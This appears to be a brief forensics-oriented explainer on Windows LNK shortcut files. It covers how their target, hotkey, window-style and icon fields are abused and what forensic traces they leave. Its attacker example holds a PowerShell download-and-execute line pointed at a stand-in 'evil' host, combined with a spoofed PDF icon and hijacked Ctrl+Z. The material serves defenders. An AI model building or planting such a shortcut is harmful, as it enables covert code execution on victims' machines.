LNK Files (Shortcut Files)

LNK files are Windows shortcuts that point to files, folders, or executables. They’re created automatically (like for recent documents) or manually by users—and are often abused by attackers for Initial Access or Persistence.

Default location:

C:\\Users\\$USER$\\AppData\\Roaming\\Microsoft\\Windows\\Recent
User-created:

Can exist anywhere (e.g. Desktop, Startup folder, Downloads)

Four Key Fields in the Shortcut Tab

Target
- Combines TargetPath + Arguments (e.g. powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "…")
- Abuse: embed long or obfuscated one-liners (up to 4096 chars; UI shows only ~260 chars).
Shortcut key
- HotKey combo (e.g. Ctrl+Z)
- Abuse: victim triggers payload by pressing a “familiar” shortcut.
Run
- WindowStyle (Normal / Minimized / Maximized)
- Abuse: pick Minimized or Hidden to mask console windows.
Change Icon
- IconLocation (plus icon-related ExtraData)
- Abuse: spoof a PDF/Word icon (e.g. using AcroRd32.exe,0) to look benign.

Quick Attacker Example

A single .lnk embedding all four tricks:

Field	Value
Target	`C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('<http://evil/payload.ps1>')"`
HotKey	Ctrl + Z
Run	Minimized
Icon	`C:\\Program Files\\Adobe\\Reader\\AcroRd32.exe,0` (PDF icon)

When the victim presses Ctrl +Z (or double-clicks the shortcut), Explorer launches PowerShell in a hidden/minimized window, which then fetches and executes the malicious script from the attacker’s server—while the PDF icon and familiar hotkey keep the user unsuspecting.

Forensic Value of LNK Files

Original Path: Where the shortcut pointed (relative/absolute).
Timestamps: Creation, last modification, and last launch times.
Volume & Share Info: Drive serial number and UNC share name.